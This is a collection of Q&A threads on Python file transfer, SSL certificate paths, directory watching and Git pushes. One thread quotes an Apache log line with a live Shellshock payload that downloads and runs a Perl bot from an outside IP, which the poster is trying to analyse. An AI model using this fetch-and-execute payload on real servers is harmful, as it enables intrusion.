Facing timing issues: SFTPing a tar file and uncompressing it in Python

I am trying to tar a set of folders containing XML files at a specific location on a remote server, copy the tarball locally, and un-tar it, all in Python.
I tarred the files using the command tar -cvf.
I used the following code in Python to SFTP the tarred file:
sftp = ssh.open_sftp()
sftp.get(remotePath, localPath, callback)
sftp.close()
ssh.close()
The callback function:
def callback(transferred, tobetransferred):
    global transfer_complete
    res = abs(tobetransferred - transferred)
    if res == 0:
        transfer_complete = True
I then wait for the transfer_complete flag to become true:
while transfer_complete == False:
    time.sleep(1)
Problem faced here:
I sometimes get this error:
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
which seems to be more of a timing issue, as I can see the tar file is copied intact but it still cannot be untarred. I see this problem roughly once every 20-30 runs.
Is there an efficient way of doing this that removes the timing issue? I suspect the file is still being copied while I try to untar it.
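One observation that may remove the timing issue entirely: paramiko's sftp.get() blocks until the download has finished, so the transfer_complete flag and the polling loop are redundant. The more likely race is that the remote tar -cvf is still writing the archive when the download starts. Below is a minimal sketch (assuming paramiko plus the standard-library tarfile module; fetch_and_untar and its arguments are hypothetical names) that waits for the remote file size to stabilise, verifies the local copy, and only then untars:

import os
import time
import tarfile

def fetch_and_untar(ssh, remote_path, local_path, extract_dir):
    sftp = ssh.open_sftp()
    try:
        # Wait until the remote tar file stops growing, i.e. the remote
        # tar -cvf has most likely finished writing it.
        size = -1
        while True:
            new_size = sftp.stat(remote_path).st_size
            if new_size == size:
                break
            size = new_size
            time.sleep(2)

        # get() blocks until the whole file is downloaded,
        # so no completion flag or polling loop is needed.
        sftp.get(remote_path, local_path)

        # Sanity check: the local copy must match the remote size.
        if os.path.getsize(local_path) != size:
            raise IOError('incomplete transfer of %s' % remote_path)
    finally:
        sftp.close()

    with tarfile.open(local_path) as tar:
        tar.extractall(extract_dir)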

Specify a download path using the wget module in python

I'm trying to download files from a site using the wget module.
The code is really simple:
image = 'linkoftheimage'
wget.download(image)
This works fine, but it saves the file in the folder with the python script. My goal is to download it in a different folder, but I can't find a way to specify it.
I tried a different approach with the os module:
os.system(f'wget -O {directory} {image}')
This method gives me an error: sh: -c: line 0: syntax error near unexpected token `('
So I tried another method:
with open(f'{directory}/photo %s.jpg' % a, 'wb') as handler:
    handler.write(image)
This also didn't work out.
Does anyone have an idea on how I could solve this?
The package you specified has not been updated since 2015 and its repository is gone, so it should probably be avoided. You can download files using the requests module like so:
import requests

image_url = 'https://www.fillmurray.com/200/300'
file_destination = 'desired/destination/file.jpg'

res = requests.get(image_url)
if res.status_code == 200:  # HTTP 200 means success
    with open(file_destination, 'wb') as file_handle:  # 'wb' means write binary
        file_handle.write(res.content)
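For larger files, a variation worth considering is streaming the response to disk instead of holding it all in memory; a sketch using the same requests module (the URL and destination are placeholders):

import requests

image_url = 'https://www.fillmurray.com/200/300'
file_destination = 'desired/destination/file.jpg'

# stream=True avoids loading the whole response body into memory at once
with requests.get(image_url, stream=True) as res:
    res.raise_for_status()  # raises on a non-2xx status instead of checking 200 by hand
    with open(file_destination, 'wb') as file_handle:
        for chunk in res.iter_content(chunk_size=8192):
            file_handle.write(chunk)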

FileNotFoundError when file exists (when created in current script)

I am trying to create a secure (e.g., SSL/HTTPS) XML-RPC Client Server. The client-server part works perfectly when the required certificates are present on my system; however, when I try to create the certificates during execution, I receive a FileNotFoundError when opening the ssl-wrapped socket, even though the certificates are clearly present (because the preceding function created them).
Why is the FileNotFoundError given when the files are present? (If I simply close and restart the python script no error is produced when opening the socket and everything works with no issue whatsoever.)
I've searched elsewhere for solutions, but the best/closest answer I've found is, perhaps, "race conditions" between creating the certificates and opening them. However, I've tried adding "sleep" to alleviate the possibility of race conditions (as well as running each function individually via a user input menu) with the same error every time.
What am I missing?
Here is a snippet of my code:
import os
import threading
import ssl
import time
from xmlrpc.server import SimpleXMLRPCServer
import certs.gencert as gencert  # <---- My python module for generating certs
...
rootDomain = "mydomain"
CERTFILE = "certs/mydomain.cert"
KEYFILE = "certs/mydomain.key"
...

def listenNow(ipAdd, portNum, serverCert, serverKey):
    # Create XMLRPC Server, based on ipAdd/port received
    server = SimpleXMLRPCServer((ipAdd, portNum))

    # **THIS** is what causes the FileNotFoundError ONLY if
    # the certificates are created during THE SAME execution
    # of the program.
    server.socket = ssl.wrap_socket(server.socket,
                                    certfile=serverCert,
                                    keyfile=serverKey,
                                    do_handshake_on_connect=True,
                                    server_side=True)
    ...
    # Start server listening [forever]
    server.serve_forever()

...

# Verify Certificates are present; if not present,
# create new certificates
def verifyCerts():
    # If cert or key file not present, create new certs
    if not os.path.isfile(CERTFILE) or not os.path.isfile(KEYFILE):
        # NOTE: This [gencert] will create certificates matching
        # the file names listed in CERTFILE and KEYFILE at the top
        gencert.gencert(rootDomain)
        print("Certfile(s) NOT present; new certs created.")
    else:
        print("Certfiles Verified Present")

# Start a thread to run server connection as a daemon
def startServer(hostIP, serverPort):
    # Verify certificates present prior to starting server
    verifyCerts()

    # Now, start thread
    t = threading.Thread(name="ServerDaemon",
                         target=listenNow,
                         args=(hostIP,
                               serverPort,
                               CERTFILE,
                               KEYFILE
                               )
                         )
    t.daemon = True
    t.start()

if __name__ == '__main__':
    startServer("127.0.0.1", 12345)
    time.sleep(60)  # <--To allow me to connect w/client before closing
When I run the above, with NO certificates present, this is the error I receive:
$ python3 test.py
Certfile(s) NOT present; new certs created.
Exception in thread ServerDaemon:
Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.5/threading.py", line 862, in run
    self._target(*self._args, **self._kwargs)
  File "test.py", line 41, in listenNow
    server_side=True)
  File "/usr/lib/python3.5/ssl.py", line 1069, in wrap_socket
    ciphers=ciphers)
  File "/usr/lib/python3.5/ssl.py", line 691, in __init__
    self._context.load_cert_chain(certfile, keyfile)
FileNotFoundError: [Errno 2] No such file or directory
When I simply re-run the script a second time (i.e., the cert files are already present when it starts), everything runs as expected with NO errors, and I can connect my client just fine.
$ python3 test.py
Certfiles Verified Present
What is preventing the ssl.wrap_socket function from seeing/accessing the files that were just created (and thus producing the FileNotFoundError exception)?
EDIT 1:
Thanks for the comments, John Gordon. Here is a copy of gencert.py, courtesy of Atul Varm, found here: https://gist.github.com/toolness/3073310
import os
import sys
import hashlib
import subprocess
import datetime

OPENSSL_CONFIG_TEMPLATE = """
prompt = no
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ req_distinguished_name ]
C = US
ST = IL
L = Chicago
O = Toolness
OU = Experimental Software Authority
CN = %(domain)s
emailAddress = varmaa@toolness.com

[ v3_req ]
# Extensions to add to a certificate request
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names

[ alt_names ]
DNS.1 = %(domain)s
DNS.2 = *.%(domain)s
"""

MYDIR = os.path.abspath(os.path.dirname(__file__))
OPENSSL = '/usr/bin/openssl'
KEY_SIZE = 1024
DAYS = 3650
CA_CERT = 'ca.cert'
CA_KEY = 'ca.key'

# Extra X509 args. Consider using e.g. ('-passin', 'pass:blah') if your
# CA password is 'blah'. For more information, see:
#
# http://www.openssl.org/docs/apps/openssl.html#PASS_PHRASE_ARGUMENTS

X509_EXTRA_ARGS = ()

def openssl(*args):
    cmdline = [OPENSSL] + list(args)
    subprocess.check_call(cmdline)

def gencert(domain, rootdir=MYDIR, keysize=KEY_SIZE, days=DAYS,
            ca_cert=CA_CERT, ca_key=CA_KEY):
    def dfile(ext):
        return os.path.join('domains', '%s.%s' % (domain, ext))

    os.chdir(rootdir)

    if not os.path.exists('domains'):
        os.mkdir('domains')

    if not os.path.exists(dfile('key')):
        openssl('genrsa', '-out', dfile('key'), str(keysize))
        # EDIT 3: mydomain.key gets output here during execution

    config = open(dfile('config'), 'w')
    config.write(OPENSSL_CONFIG_TEMPLATE % {'domain': domain})
    config.close()
    # EDIT 3: mydomain.config gets output here during execution

    openssl('req', '-new', '-key', dfile('key'), '-out', dfile('request'),
            '-config', dfile('config'))
    # EDIT 3: mydomain.request gets output here during execution

    openssl('x509', '-req', '-days', str(days), '-in', dfile('request'),
            '-CA', ca_cert, '-CAkey', ca_key,
            '-set_serial',
            '0x%s' % hashlib.md5(domain +
                                 str(datetime.datetime.now())).hexdigest(),
            '-out', dfile('cert'),
            '-extensions', 'v3_req', '-extfile', dfile('config'),
            *X509_EXTRA_ARGS)
    # EDIT 3: mydomain.cert gets output here during execution

    print "Done. The private key is at %s, the cert is at %s, and the " \
          "CA cert is at %s." % (dfile('key'), dfile('cert'), ca_cert)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "usage: %s <domain-name>" % sys.argv[0]
        sys.exit(1)
    gencert(sys.argv[1])
EDIT 2:
Regarding John's comment, "this might mean that those files are being created, but not in the directory [I] expect":
When I have the directory open in another window, I see the files pop up in the correct location during execution. In addition, when running the test.py script a second time with no changes, the files are identified as present in the correct (the same) location. This leads me to believe that file location is not the problem. Thanks for the suggestion. I'll keep looking.
EDIT 3:
I stepped through the gencert.py program, and each of the files are correctly output at the right time during execution. I indicated when exactly they were output within the above file, labeled with "EDIT 3"
While gencert is paused awaiting my input (raw_input), I can open/view/edit the mentioned files in another program with no problem.
In addition, with the first test.py instance running (paused, waiting for user input, just after mydomain.cert appears), I can run a second instance of test.py in another terminal and it sees/uses the files just fine.
Within the first instance, however, if I continue the program it outputs "FileNotFoundError."
The problem stems from the use of os.chdir(rootdir), as suggested by John; however, the specifics are slightly different from the created files being in the wrong location. The problem is that the current working directory (cwd) of the running program is changed by gencert(). Here are the specifics:
1. The program is started with test.py, which calls verifyCerts(). At this point the program is running in whichever folder test.py lives in; use os.getcwd() to confirm the current directory at this point. In this example it is:
/home/name/testfolder/
2. Next, os.path.isfile() looks for the files "certs/mydomain.cert" and "certs/mydomain.key"; relative to the cwd above, it is looking for:
/home/name/testfolder/certs/mydomain.cert
/home/name/testfolder/certs/mydomain.key
3. The above files are not present, so the program executes gencert.gencert(rootDomain), which correctly creates both files in the exact locations listed in number 2.
4. The problem is indeed the os.chdir() call: when gencert() executes, it uses os.chdir() to change the cwd to rootdir, which is os.path.abspath(os.path.dirname(__file__)), i.e. the directory of the current file (gencert.py). Since this file is located one folder deeper, the new cwd becomes:
/home/name/testfolder/certs/
5. When gencert() finishes and control returns to test.py, the cwd never changes again; it remains /home/name/testfolder/certs/ even after execution returns to test.py.
6. Later, when ssl.wrap_socket() tries to find serverCert and serverKey, it looks for "certs/mydomain.cert" and "certs/mydomain.key" relative to the cwd, so the full paths it looks for are:
/home/name/testfolder/certs/certs/mydomain.cert
/home/name/testfolder/certs/certs/mydomain.key
7. These two files are NOT present, so the program correctly raises FileNotFoundError.
Solution
A) Move the "gencert.py" file to the same directory as "test.py"
B) At the beginning of "gencert.py" add cwd = os.getcwd() to record the original cwd of the program; then, at the very end, add os.chdir(cwd) to change back to the original cwd before ending and giving control back to the calling program.
I went with option 'B', and my program now works flawlessly. I appreciate the assistance from John Gordon to point me toward finding the source of my problem.
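For reference, here is a minimal sketch of option 'B' applied inside gencert(); the try/finally is my own addition so the original cwd is restored even if one of the openssl calls raises:

def gencert(domain, rootdir=MYDIR, keysize=KEY_SIZE, days=DAYS,
            ca_cert=CA_CERT, ca_key=CA_KEY):
    cwd = os.getcwd()   # record the caller's working directory
    os.chdir(rootdir)
    try:
        ...             # existing key/config/request/cert generation
    finally:
        os.chdir(cwd)   # always restore it before returning control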

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl, which could be a modified version of Cox-Data-Usage, which is on GitHub.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded; it contains ShellBOT by devil__, so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17, and maybe BSD*; not that harmless to me, and IRC-related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know whether the file is free, since any modification will fail while it is still being downloaded/created. That also means a request for that file can come in before you've moved or renamed it programmatically, which is why this isn't a complete solution.
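If you do want the watchdog route for exactly this use case, here is a minimal sketch (assuming only the watchdog package; the quarantine path is a placeholder) that reacts to file creation alone and copies each new file out of /tmp. Note it is still subject to the race described above, since the attacker's script removes the file almost immediately:

import shutil
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

QUARANTINE = '/var/quarantine'  # placeholder destination directory

class CopyNewFiles(FileSystemEventHandler):
    def on_created(self, event):
        if not event.is_directory:
            try:
                shutil.copy2(event.src_path, QUARANTINE)  # preserve metadata
            except OSError:
                pass  # the file may already be gone or still being written

if __name__ == "__main__":
    observer = Observer()
    observer.schedule(CopyNewFiles(), '/tmp', recursive=False)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()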
Here are a couple of solutions.
Solution 1 (CPU usage: 27.9%, approx. 30%):

import os

path_to_watch = "your/path"
print('Your folder path is "', path_to_watch, '"')
before = dict([(f, None) for f in os.listdir(path_to_watch)])
while 1:
    after = dict([(f, None) for f in os.listdir(path_to_watch)])
    added = [f for f in after if f not in before]
    if added:
        print("Added: ", ", ".join(added))
        break
    else:
        before = after
I have edited the code; the original is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html. The original code was written for Python 2.x, so you need to convert it for Python 3.
Note: whenever you add any file to the path, it prints the message and breaks; if no files are added, it keeps running.
Solution 2 (CPU usage: 23.4%, approx. 20%):
import os

path = r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b = os.listdir(path)
path_len_org = len(b)

def file_check():
    while 1:
        b = os.listdir(path)
        path_len_final = len(b)
        if path_len_org < path_len_final:
            return "A file is added"
        elif path_len_org > path_len_final:
            return "A file is removed"
        else:
            pass

file_check()

Getting WindowsError when trying to copy a file from one directory to another with paramiko

Good afternoon,
I am getting the following error whenever I am trying to copy a test file from one directory to another on a remote server:
Traceback (most recent call last):
  File "", line 1, in
  File "C:\Python27\lib\site-packages\paramiko-1.12.0-py2.7.egg\paramiko\sftp_client.py", line 612, in put
    file_size = os.stat(localpath).st_size
WindowsError: [Error 3] The system cannot find the path specified: '/brass/prod/bin/chris/test1/km_cust'
The file I am looking to copy is called km_cust.
I am executing these commands in python 2.7.
Please note that the hostname, uid, and password were changed to generic versions; the real hostname, uid, and password can be used to ssh to the box in question and perform all functionality.
Here is my code:
import paramiko
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.connect('hostname',username='test',password='pw')
filepath = '/brass/prod/bin/chris/test1/km_cust'
localpath = 'brass/prod/bin/chris/test2'
sftp = s.open_sftp()
sftp.put(filepath, localpath)
Any help will be appreciated. Let me know if any other information is needed.
The problem is that put copies a local file—that is, a file on your Windows box—to the server. As the documentation says:
put(self, localpath, remotepath, callback=None, confirm=True)
Copy a local file (localpath) to the SFTP server as remotepath.
Note that you're also specifying (or at least naming) the paths backward… but that doesn't really matter here, because neither one is actually a local path. So when you do this:
sftp.put(filepath, localpath)
… it's looking for a file named '/brass/prod/bin/chris/test1/km_cust' on your Windows box, and of course it can't find such a file.
If you want to copy a remote file to a different remote file, you need to do something like this:
f = sftp.open(filepath)
sftp.putfo(f, localpath)
Or:
f = sftp.open(localpath, 'wx')
sftp.getfo(filepath, f)
Also, I'm guessing your localpath is supposed to start with a /.
However, this probably isn't what you wanted to do in the first place. Copying a file from the remote server to the remote server via sftp involves downloading all of the bytes to your Windows machine and then uploading them back to the remote machine. A better solution would be to just tell the machine to do the copy itself:
s.exec_command("cp '{}' '{}'".format(filepath, localpath))
s.close()
Note that in anything but the most trivial of cases, you're going to have to deal with the Channel and its in/out/err and wait on its exit status. But I believe that for this case, you should be fine.
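For example, a minimal sketch of checking the exit status of that remote cp (recv_exit_status blocks until the command finishes):

stdin, stdout, stderr = s.exec_command("cp '{}' '{}'".format(filepath, localpath))
exit_status = stdout.channel.recv_exit_status()  # wait for the remote cp to finish
if exit_status != 0:
    raise RuntimeError('remote cp failed: ' + stderr.read())
s.close()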

How do you define the host for Fabric to push to GitHub?

Original Question
I've got some python scripts which have been using Amazon S3 to upload screenshots taken following Selenium tests within the script.
Now we're moving from S3 to use GitHub so I've found GitPython but can't see how you use it to actually commit to the local repo and push to the server.
My script builds a directory structure similar to \images\228M\View_Use_Case\1.png in the workspace, and when uploading to S3 it was a simple process:
for root, dirs, files in os.walk(imagesPath):
    for name in files:
        filename = os.path.join(root, name)
        k = bucket.new_key('{0}/{1}/{2}'.format(revisionNumber, images_process, name))  # returns a new key object
        k.set_contents_from_filename(filename, policy='public-read')  # opens local file buffers to key on S3
        k.set_metadata('Content-Type', 'image/png')
Is there something similar for this or is there something as simple as a bash type git add images command in GitPython that I've completely missed?
Updated with Fabric
So I've installed Fabric on kracekumar's recommendation but I can't find docs on how to define the (GitHub) hosts.
My script is pretty simple; I'm just trying to get the upload to work:
from __future__ import with_statement
from fabric.api import *
from fabric.contrib.console import confirm
import os

def git_server():
    env.hosts = ['github.com']
    env.user = 'git'
    env.password = 'password'

def test():
    process = 'View Employee'
    os.chdir('\Work\BPTRTI\main\employer_toolkit')
    with cd('\Work\BPTRTI\main\employer_toolkit'):
        result = local('ant viewEmployee_git')
        if result.failed and not confirm("Tests failed. Continue anyway?"):
            abort("Aborting at user request.")

def deploy():
    process = "View Employee"
    os.chdir('\Documents and Settings\markw\GitTest')
    with cd('\Documents and Settings\markw\GitTest'):
        local('git add images')
        local('git commit -m "Latest Selenium screenshots for %s"' % (process))
        local('git push -u origin master')

def viewEmployee():
    #test()
    deploy()
It Works \o/ Hurrah.
You should look into Fabric: http://docs.fabfile.org/en/1.4.1/index.html. It's an automated server deployment tool. I have been using it for quite some time and it works pretty well.
Here is one of my applications that uses it: https://github.com/kracekumar/sachintweets/blob/master/fabfile.py
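One note on the hosts question, since GitHub isn't a machine you run arbitrary commands on: for pushing, you don't need env.hosts at all; local() runs git on your own machine, and git's remote configuration and credentials handle GitHub. env.hosts only matters for run()/sudo() on servers you control. A minimal sketch (the hostname is a placeholder):

from fabric.api import env, local, run

env.hosts = ['deploy@myserver.example.com']  # your own server, NOT github.com

def push():
    # runs locally; git's configured remote handles GitHub auth
    local('git push -u origin master')

def restart():
    # runs over SSH on each host in env.hosts
    run('service apache2 restart')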
It looks like you can do this:
index = repo.index
index.add(['images'])
new_commit = index.commit("my commit message")
and then, assuming you have origin as the default remote:
origin = repo.remotes.origin
origin.push()
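Putting that together, a minimal end-to-end sketch with GitPython (the repo path is a placeholder):

from git import Repo

repo = Repo('/path/to/your/local/checkout')  # placeholder path to an existing clone
repo.index.add(['images'])
repo.index.commit('Latest Selenium screenshots')
repo.remotes.origin.push()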
